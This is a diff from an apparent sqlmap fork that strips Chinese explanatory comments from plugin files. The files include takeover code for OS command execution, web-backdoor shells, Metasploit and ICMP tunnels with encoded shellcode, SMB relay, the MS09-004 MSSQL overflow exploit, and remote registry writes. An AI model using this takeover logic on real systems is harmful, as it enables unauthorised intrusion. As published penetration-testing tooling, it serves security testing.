if (not isStackingAvailable() or kb.udfFail) and not conf.direct:
return
if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest: # 如果执行系统命令/shell 且是 PostgreSQL 且 copyExecTest 为 True
return # 直接返回
if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest:
return
if Backend.isOs(OS.WINDOWS): # 如果操作系统是 Windows
libtype = "dynamic-link library" # 设置库类型为动态链接库
if Backend.isOs(OS.WINDOWS):
libtype = "dynamic-link library"
elif Backend.isOs(OS.LINUX): # 如果操作系统是 Linux
libtype = "shared object" # 设置库类型为共享对象
elif Backend.isOs(OS.LINUX):
libtype = "shared object"
else: # 如果是其他操作系统
libtype = "shared library" # 设置库类型为共享库
else:
libtype = "shared library"
if onlyFileTbl: # 如果只清理文件表
logger.debug("cleaning up the database management system") # 输出调试信息
else: # 如果清理所有
logger.info("cleaning up the database management system") # 输出信息
if onlyFileTbl:
logger.debug("cleaning up the database management system")
else:
logger.info("cleaning up the database management system")
logger.debug("removing support tables") # 输出调试信息
inject.goStacked("DROP TABLE %s" % self.fileTblName, silent=True) # 删除文件表
inject.goStacked("DROP TABLE %shex" % self.fileTblName, silent=True) # 删除文件表 (hex)
logger.debug("removing support tables")
inject.goStacked("DROP TABLE %s" % self.fileTblName, silent=True)
inject.goStacked("DROP TABLE %shex" % self.fileTblName, silent=True)
if not onlyFileTbl: # 如果不是只清理文件表
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) # 删除命令表
if not onlyFileTbl:
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
if Backend.isDbms(DBMS.MSSQL): # 如果是 MSSQL
udfDict = {"master..new_xp_cmdshell": {}} # 设置要删除的 udf (xp_cmdshell)
if Backend.isDbms(DBMS.MSSQL):
udfDict = {"master..new_xp_cmdshell": {}}
if udfDict is None: # 如果 udfDict 为空
udfDict = getattr(self, "sysUdfs", {}) # 获取系统 udf
if udfDict is None:
udfDict = getattr(self, "sysUdfs", {})
for udf, inpRet in udfDict.items(): # 遍历 udf
message = "do you want to remove UDF '%s'? [Y/n] " % udf # 输出询问信息
for udf, inpRet in udfDict.items():
message = "do you want to remove UDF '%s'? [Y/n] " % udf
if readInput(message, default='Y', boolean=True): # 获取用户输入
dropStr = "DROP FUNCTION %s" % udf # 构建删除 udf 命令
if readInput(message, default='Y', boolean=True):
dropStr = "DROP FUNCTION %s" % udf
if Backend.isDbms(DBMS.PGSQL): # 如果是 PostgreSQL
inp = ", ".join(i for i in inpRet["input"]) # 获取输入参数
dropStr += "(%s)" % inp # 添加输入参数到删除命令
if Backend.isDbms(DBMS.PGSQL):
inp = ", ".join(i for i in inpRet["input"])
dropStr += "(%s)" % inp
logger.debug("removing UDF '%s'" % udf) # 输出调试信息
inject.goStacked(dropStr, silent=True) # 删除 udf
logger.debug("removing UDF '%s'" % udf)
inject.goStacked(dropStr, silent=True)
logger.info("database management system cleanup finished") # 输出信息
logger.info("database management system cleanup finished")
warnMsg = "remember that UDF %s files " % libtype # 构建警告信息
warnMsg = "remember that UDF %s files " % libtype
if conf.osPwn: # 如果开启 osPwn 功能
warnMsg += "and Metasploit related files in the temporary " # 添加 Metasploit 相关文件信息
if conf.osPwn:
warnMsg += "and Metasploit related files in the temporary "
warnMsg += "folder "
warnMsg += "saved on the file system can only be deleted " # 添加手动删除信息
warnMsg += "saved on the file system can only be deleted "
warnMsg += "manually"
logger.warning(warnMsg) # 输出警告信息
logger.warning(warnMsg)
# 定义 likeOrExact 方法,用于选择 LIKE 或精确匹配
def likeOrExact(self, what):
message = "do you want sqlmap to consider provided %s(s):\
" % what # 构建询问信息
message += "[1] as LIKE %s names (default)\
" % what
message = "do you want sqlmap to consider provided %s(s):\n" % what
message += "[1] as LIKE %s names (default)\n" % what
message += "[2] as exact %s names" % what
choice = readInput(message, default='1') # 获取用户选择
choice = readInput(message, default='1')
if not choice or choice == '1': # 如果选择 LIKE 匹配
if not choice or choice == '1':
choice = '1'
condParam = " LIKE '%%%s%%'" # 设置 LIKE 条件
elif choice == '2': # 如果选择精确匹配
condParam = "='%s'" # 设置精确匹配条件
else: # 如果输入非法
errMsg = "invalid value" # 输出错误信息
raise SqlmapNoneDataException(errMsg) # 抛出异常
return choice, condParam # 返回选择和条件
condParam = " LIKE '%%%s%%'"
elif choice == '2':
condParam = "='%s'"
else:
errMsg = "invalid value"
raise SqlmapNoneDataException(errMsg)
return choice, condParam

718
src/sqlmap-master/plugins/generic/search.py
View File

File diff suppressed because it is too large Load Diff

71
src/sqlmap-master/plugins/generic/syntax.py
Unescape View File

@ -5,71 +5,46 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re # 导入re模块用于正则表达式操作
import re
from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.convert import getBytes # 导入getBytes函数用于将字符串转换为字节
from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
from lib.core.common import Backend
from lib.core.convert import getBytes
from lib.core.data import conf
from lib.core.enums import DBMS
from lib.core.exception import SqlmapUndefinedMethod
class Syntax(object):
"""
This class defines generic syntax functionalities for plugins.
这个类定义了插件的通用语法功能
"""
def __init__(self):
pass # 初始化方法,此处为空
pass
@staticmethod
def _escape(expression, quote=True, escaper=None):
"""
Internal method to escape a given expression.
内部方法用于转义给定的表达式
retVal = expression
Args:
expression (str): The expression to escape. 要转义的表达式
quote (bool, optional): Whether to handle quoting. 是否处理引号默认为True
escaper (function, optional): The function to use for escaping. 用于转义的函数默认为None
Returns:
str: 转义后的表达式
"""
retVal = expression # 初始化返回值
if quote: # 如果需要处理引号
for item in re.findall(r"'[^']*'+", expression): # 查找所有单引号包裹的内容
original = item[1:-1] # 获取引号内的原始内容
if original: # 如果原始内容不为空
if quote:
for item in re.findall(r"'[^']*'+", expression):
original = item[1:-1]
if original:
if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression:
continue # 如果是SQLite数据库且表达式中包含X'...'的格式,则跳过
if re.search(r"$$(SLEEPTIME|RAND)", original) is None: # 检查原始内容是否包含[SLEEPTIME]或[RAND]标记,例如'[SLEEPTIME]'
replacement = escaper(original) if not conf.noEscape else original # 如果配置中没有设置noEscape则使用转义函数进行转义否则不转义
if replacement != original: # 如果转义后的内容与原始内容不同
retVal = retVal.replace(item, replacement) # 则替换表达式中的原始内容为转义后的内容
continue
if re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. '[SLEEPTIME]' marker
replacement = escaper(original) if not conf.noEscape else original
if replacement != original:
retVal = retVal.replace(item, replacement)
elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL):
# 如果原始内容的字节长度与字符串长度不同且不是n'...'格式且数据库为MySQLPostgreSQLOracleMSSQL中的一种
retVal = retVal.replace("'%s'" % original, "n'%s'" % original) # 则将表达式中的原始内容替换为n'...'格式以支持Unicode字符
else: # 如果不需要处理引号
retVal = escaper(expression) # 使用转义函数进行转义
retVal = retVal.replace("'%s'" % original, "n'%s'" % original)
else:
retVal = escaper(expression)
return retVal # 返回转义后的表达式
return retVal
@staticmethod
def escape(expression, quote=True):
"""
Generic method to escape a given expression.
通用方法用于转义给定的表达式
Args:
expression (str): The expression to escape. 要转义的表达式
quote (bool, optional): Whether to handle quoting. 是否处理引号默认为True
Raises:
SqlmapUndefinedMethod: 如果没有在具体数据库插件中定义escape方法则抛出此异常
"""
errMsg = "'escape' method must be defined "
errMsg += "inside the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法
raise SqlmapUndefinedMethod(errMsg)

386
src/sqlmap-master/plugins/generic/takeover.py
Unescape View File

@ -5,262 +5,234 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import os # 导入os模块提供与操作系统交互的功能
from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.common import getSafeExString # 导入getSafeExString函数用于获取安全的异常字符串
from lib.core.common import isDigit # 导入isDigit函数用于判断字符串是否为数字
from lib.core.common import isStackingAvailable # 导入isStackingAvailable函数用于判断是否支持堆叠查询
from lib.core.common import openFile # 导入openFile函数用于安全地打开文件
from lib.core.common import readInput # 导入readInput函数用于安全地读取用户输入
from lib.core.common import runningAsAdmin # 导入runningAsAdmin函数用于判断是否以管理员身份运行
from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.data import kb # 导入kb对象存储全局知识库信息
from lib.core.data import logger # 导入logger对象用于记录日志
from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.enums import OS # 导入OS枚举类定义操作系统类型
from lib.core.exception import SqlmapFilePathException # 导入SqlmapFilePathException异常类表示文件路径错误
from lib.core.exception import SqlmapMissingDependence # 导入SqlmapMissingDependence异常类表示缺少依赖
from lib.core.exception import SqlmapMissingMandatoryOptionException # 导入SqlmapMissingMandatoryOptionException异常类表示缺少必要选项
from lib.core.exception import SqlmapMissingPrivileges # 导入SqlmapMissingPrivileges异常类表示缺少权限
from lib.core.exception import SqlmapNotVulnerableException # 导入SqlmapNotVulnerableException异常类表示目标不漏洞
from lib.core.exception import SqlmapSystemException # 导入SqlmapSystemException异常类表示系统错误
from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
from lib.core.exception import SqlmapUnsupportedDBMSException # 导入SqlmapUnsupportedDBMSException异常类表示不支持的数据库类型
from lib.takeover.abstraction import Abstraction # 导入Abstraction类用于定义抽象的接管功能
from lib.takeover.icmpsh import ICMPsh # 导入ICMPsh类用于定义ICMP隧道功能
from lib.takeover.metasploit import Metasploit # 导入Metasploit类用于定义Metasploit接管功能
from lib.takeover.registry import Registry # 导入Registry类用于定义注册表操作功能
import os
from lib.core.common import Backend
from lib.core.common import getSafeExString
from lib.core.common import isDigit
from lib.core.common import isStackingAvailable
from lib.core.common import openFile
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUndefinedMethod
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.takeover.abstraction import Abstraction
from lib.takeover.icmpsh import ICMPsh
from lib.takeover.metasploit import Metasploit
from lib.takeover.registry import Registry
class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
"""
This class defines generic OS takeover functionalities for plugins.
这个类定义了插件的通用操作系统接管功能
"""
def __init__(self):
# 初始化命令输出表名称和字段名称
self.cmdTblName = ("%soutput" % conf.tablePrefix) # 命令输出表名,使用配置中的表前缀
self.tblField = "data" # 表字段名,存储命令输出数据
self.cmdTblName = ("%soutput" % conf.tablePrefix)
self.tblField = "data"
Abstraction.__init__(self) # 初始化Abstraction基类
Abstraction.__init__(self)
def osCmd(self):
"""
Executes a single operating system command.
执行单个操作系统命令
"""
# 判断是否可以通过堆叠查询或直接连接执行系统命令
if isStackingAvailable() or conf.direct:
web = False # 如果支持堆叠查询或直接连接则不使用Web后门
web = False
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg)
web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
web = True
else:
errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS"
raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常,表示无法通过后端数据库执行系统命令
raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath() # 获取远程临时路径
self.initEnv(web=web) # 初始化环境
self.getRemoteTempPath()
self.initEnv(web=web)
# 如果不使用Web后门或者使用Web后门但URL存在则执行命令
if not web or (web and self.webBackdoorUrl is not None):
self.runCmd(conf.osCmd) # 执行配置中的系统命令
self.runCmd(conf.osCmd)
# 如果不开启操作系统shell或pwn并且没有清理需求则进行清理
if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) # 清理环境
self.cleanup(web=web)
def osShell(self):
"""
Prompts for an interactive operating system shell.
提示进行交互式操作系统shell
"""
# 判断是否可以通过堆叠查询或直接连接执行shell
if isStackingAvailable() or conf.direct:
web = False # 如果支持堆叠查询或直接连接则不使用Web后门
web = False
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg)
web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
web = True
else:
errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常表示无法通过后端数据库获取交互式shell
raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath() # 获取远程临时路径
self.getRemoteTempPath()
try:
self.initEnv(web=web) # 初始化环境
except SqlmapFilePathException: # 如果初始化环境出现文件路径异常
self.initEnv(web=web)
except SqlmapFilePathException:
if not web and not conf.direct:
infoMsg = "falling back to web backdoor method..."
logger.info(infoMsg)
web = True # 回退到使用Web后门
kb.udfFail = True # 设置UDF失败标记
web = True
kb.udfFail = True
self.initEnv(web=web) # 重新初始化环境使用Web后门
self.initEnv(web=web)
else:
raise # 如果不能回退到Web后门则抛出异常
raise
# 如果不使用Web后门或者使用Web后门但URL存在则进入shell
if not web or (web and self.webBackdoorUrl is not None):
self.shell() # 进入shell
self.shell()
# 如果不开启操作系统pwn并且没有清理需求则进行清理
if not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) # 清理环境
self.cleanup(web=web)
def osPwn(self):
"""
Attempts to gain an out-of-band session via Metasploit or ICMP.
尝试通过Metasploit或ICMP获取带外会话
"""
goUdf = False # 是否使用UDF执行
fallbackToWeb = False # 是否回退到Web后门
setupSuccess = False # 是否设置成功
goUdf = False
fallbackToWeb = False
setupSuccess = False
self.checkDbmsOs() # 检查数据库服务器操作系统
self.checkDbmsOs()
if Backend.isOs(OS.WINDOWS): # 如果操作系统是Windows
if Backend.isOs(OS.WINDOWS):
msg = "how do you want to establish the tunnel?"
msg += "\
[1] TCP: Metasploit Framework (default)"
msg += "\
[2] ICMP: icmpsh - ICMP tunneling"
msg += "\n[1] TCP: Metasploit Framework (default)"
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
while True:
tunnel = readInput(msg, default='1') # 读取用户选择的隧道类型
tunnel = readInput(msg, default='1')
if isDigit(tunnel) and int(tunnel) in (1, 2):
tunnel = int(tunnel) # 将用户输入转换为整数
tunnel = int(tunnel)
break
else:
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) # 如果输入无效,则给出警告
logger.warning(warnMsg)
else:
tunnel = 1 # 如果不是Windows系统则默认使用TCP隧道
tunnel = 1
debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows"
logger.debug(debugMsg)
if tunnel == 2: # 如果选择ICMP隧道
isAdmin = runningAsAdmin() # 判断是否以管理员身份运行
if tunnel == 2:
isAdmin = runningAsAdmin()
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg) # 如果不是以管理员身份运行,则抛出异常,表示缺少权限
raise SqlmapMissingPrivileges(errMsg)
try:
__import__("impacket") # 尝试导入impacket库
__import__("impacket")
except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "https://github.com/SecureAuthCorp/impacket"
raise SqlmapMissingDependence(errMsg) # 如果缺少impacket库则抛出异常表示缺少依赖
raise SqlmapMissingDependence(errMsg)
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" # ICMP回显忽略文件路径
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
if os.path.exists(filename):
try:
with openFile(filename, "wb") as f:
f.write("1") # 禁用ICMP回显
f.write("1")
except IOError as ex:
errMsg = "there has been a file opening/writing error "
errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex))
raise SqlmapSystemException(errMsg) # 如果文件打开/写入错误,则抛出异常
raise SqlmapSystemException(errMsg)
else:
errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\
"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\
"
errMsg += "system-wide. For example run on Linux/Unix:\n"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg) # 如果文件不存在,给出错误提示
logger.error(errMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval") # 如果是MySQL或PostgreSQL移除sys_bineval UDF
self.sysUdfs.pop("sys_bineval")
self.getRemoteTempPath() # 获取远程临时路径
self.getRemoteTempPath()
# 判断是否可以通过堆叠查询或直接连接执行
if isStackingAvailable() or conf.direct:
web = False # 如果支持堆叠查询或直接连接则不使用Web后门
web = False
self.initEnv(web=web) # 初始化环境
self.initEnv(web=web)
if tunnel == 1: # 如果选择TCP隧道
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): # 如果是MySQL或PostgreSQL
if tunnel == 1:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\
[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
while True:
choice = readInput(msg, default='1') # 读取用户选择的执行方式
choice = readInput(msg, default='1')
if isDigit(choice) and int(choice) in (1, 2):
choice = int(choice) # 将用户输入转换为整数
choice = int(choice)
break
else:
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) # 如果输入无效,则给出警告
logger.warning(warnMsg)
if choice == 1:
goUdf = True # 如果选择使用UDF则设置标记
goUdf = True
if goUdf:
exitfunc = "thread" # 如果使用UDF则设置退出函数为线程
setupSuccess = True # 设置成功
exitfunc = "thread"
setupSuccess = True
else:
exitfunc = "process" # 如果不使用UDF则设置退出函数为进程
exitfunc = "process"
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
raise SqlmapFilePathException(msg)
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg) # 如果是Windows上的MySQL且开启了提权给出调试信息
logger.debug(debugMsg)
elif tunnel == 2: # 如果选择ICMP隧道
setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
raise SqlmapFilePathException(msg)
# 如果设置不成功且是MySQL数据库且不是直接连接且不支持堆叠查询或回退到Web后门则使用Web后门
if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):
web = True # 设置使用Web后门
web = True
if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel"
@ -268,270 +240,242 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
infoMsg = "going to use a web backdoor to establish the tunnel"
logger.info(infoMsg)
self.initEnv(web=web, forceInit=fallbackToWeb) # 初始化环境,强制初始化
self.initEnv(web=web, forceInit=fallbackToWeb)
if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows
conf.privEsc = False # 如果不是Windows系统且开启了提权则关闭提权
conf.privEsc = False
warnMsg = "sqlmap does not implement any operating system "
warnMsg += "user privilege escalation technique when the "
warnMsg += "back-end DBMS underlying system is not Windows"
logger.warning(warnMsg) # 给出警告
logger.warning(warnMsg)
if tunnel == 1:
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
raise SqlmapFilePathException(msg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
raise SqlmapFilePathException(msg)
if setupSuccess:
if tunnel == 1:
self.pwn(goUdf) # 如果是TCP隧道则执行pwn
self.pwn(goUdf)
elif tunnel == 2:
self.icmpPwn() # 如果是ICMP隧道则执行icmpPwn
self.icmpPwn()
else:
errMsg = "unable to prompt for an out-of-band session"
raise SqlmapNotVulnerableException(errMsg) # 如果设置失败,则抛出异常
raise SqlmapNotVulnerableException(errMsg)
if not conf.cleanup:
self.cleanup(web=web) # 如果没有清理需求,则进行清理
self.cleanup(web=web)
def osSmb(self):
"""
Performs a SMB relay attack.
执行SMB中继攻击
"""
self.checkDbmsOs() # 检查数据库服务器操作系统
self.checkDbmsOs()
if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows: it is not possible to perform the SMB "
errMsg += "relay attack"
raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常表示不支持SMB中继攻击
raise SqlmapUnsupportedDBMSException(errMsg)
if not isStackingAvailable() and not conf.direct:
if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):
errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported"
raise SqlmapUnsupportedDBMSException(errMsg) # 如果是PostgreSQL或MSSQL且不支持堆叠查询则抛出异常
raise SqlmapUnsupportedDBMSException(errMsg)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "since stacked queries are not supported, "
debugMsg += "sqlmap is going to perform the SMB relay "
debugMsg += "attack via inference blind SQL injection"
logger.debug(debugMsg) # 如果是MySQL且不支持堆叠查询则使用盲注进行SMB中继攻击
logger.debug(debugMsg)
printWarn = True # 是否打印警告
printWarn = True
warnMsg = "it is unlikely that this attack will be successful "
if Backend.isDbms(DBMS.MYSQL):
warnMsg += "because by default MySQL on Windows runs as "
warnMsg += "Local System which is not a real user, it does "
warnMsg += "not send the NTLM session hash when connecting to "
warnMsg += "a SMB service" # 如果是MySQL给出警告
warnMsg += "a SMB service"
elif Backend.isDbms(DBMS.PGSQL):
warnMsg += "because by default PostgreSQL on Windows runs "
warnMsg += "as postgres user which is a real user of the "
warnMsg += "system, but not within the Administrators group" # 如果是PostgreSQL给出警告
warnMsg += "system, but not within the Administrators group"
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
warnMsg += "runs as Network Service which is not a real user, "
warnMsg += "it does not send the NTLM session hash when "
warnMsg += "connecting to a SMB service" # 如果是MSSQL给出警告
warnMsg += "connecting to a SMB service"
else:
printWarn = False # 如果不是上述情况,则不打印警告
printWarn = False
if printWarn:
logger.warning(warnMsg) # 打印警告信息
logger.warning(warnMsg)
self.smb() # 执行SMB中继攻击
self.smb()
def osBof(self):
"""
Exploits a buffer overflow vulnerability in the 'sp_replwritetovarbin' stored procedure (MS09-004)
利用 'sp_replwritetovarbin' 存储过程中的缓冲区溢出漏洞 (MS09-004)
"""
if not isStackingAvailable() and not conf.direct:
return # 如果不支持堆叠查询或不是直接连接,则返回
return
if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")):
errMsg = "the back-end DBMS must be Microsoft SQL Server "
errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)"
raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是MSSQL 2000或2005则抛出异常表示不支持此漏洞
raise SqlmapUnsupportedDBMSException(errMsg)
infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
infoMsg += "buffer overflow (MS09-004)"
logger.info(infoMsg) # 打印漏洞利用信息
logger.info(infoMsg)
msg = "this technique is likely to DoS the DBMS process, are you "
msg += "sure that you want to carry with the exploit? [y/N] " # 提示是否继续
msg += "sure that you want to carry with the exploit? [y/N] "
if readInput(msg, default='N', boolean=True):
self.initEnv(mandatory=False, detailed=True) # 初始化环境,不强制,但详细
self.getRemoteTempPath() # 获取远程临时路径
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) # 创建Metasploit shellcode使用SEH退出函数
self.bof() # 执行缓冲区溢出攻击
self.initEnv(mandatory=False, detailed=True)
self.getRemoteTempPath()
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
self.bof()
def uncPathRequest(self):
"""
Initiates a UNC path request.
发起UNC路径请求
"""
errMsg = "'uncPathRequest' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法
raise SqlmapUndefinedMethod(errMsg)
def _regInit(self):
"""
Initializes registry operation.
初始化注册表操作
"""
if not isStackingAvailable() and not conf.direct:
return # 如果不支持堆叠查询或不是直接连接,则返回
return
self.checkDbmsOs() # 检查数据库服务器操作系统
self.checkDbmsOs()
if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows"
raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常
raise SqlmapUnsupportedDBMSException(errMsg)
self.initEnv() # 初始化环境
self.getRemoteTempPath() # 获取远程临时路径
self.initEnv()
self.getRemoteTempPath()
def regRead(self):
"""
Reads a value from the Windows registry.
读取Windows注册表中的值
"""
self._regInit() # 初始化注册表操作
self._regInit()
if not conf.regKey:
default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
msg = "which registry key do you want to read? [%s] " % default
regKey = readInput(msg, default=default) # 读取用户输入的注册表键,默认使用指定路径
regKey = readInput(msg, default=default)
else:
regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
regKey = conf.regKey
if not conf.regVal:
default = "ProductName"
msg = "which registry key value do you want to read? [%s] " % default
regVal = readInput(msg, default=default) # 读取用户输入的注册表值默认使用ProductName
regVal = readInput(msg, default=default)
else:
regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
regVal = conf.regVal
infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal)
logger.info(infoMsg) # 打印读取注册表路径信息
logger.info(infoMsg)
return self.readRegKey(regKey, regVal, True) # 读取注册表键值,并返回结果
return self.readRegKey(regKey, regVal, True)
def regAdd(self):
"""
Adds a value to the Windows registry.
向Windows注册表添加值
"""
self._regInit() # 初始化注册表操作
self._regInit()
errMsg = "missing mandatory option" # 缺少必要参数的错误信息
errMsg = "missing mandatory option"
if not conf.regKey:
msg = "which registry key do you want to write? "
regKey = readInput(msg) # 读取用户输入的注册表键
regKey = readInput(msg)
if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
raise SqlmapMissingMandatoryOptionException(errMsg)
else:
regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
regKey = conf.regKey
if not conf.regVal:
msg = "which registry key value do you want to write? "
regVal = readInput(msg) # 读取用户输入的注册表值
regVal = readInput(msg)
if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
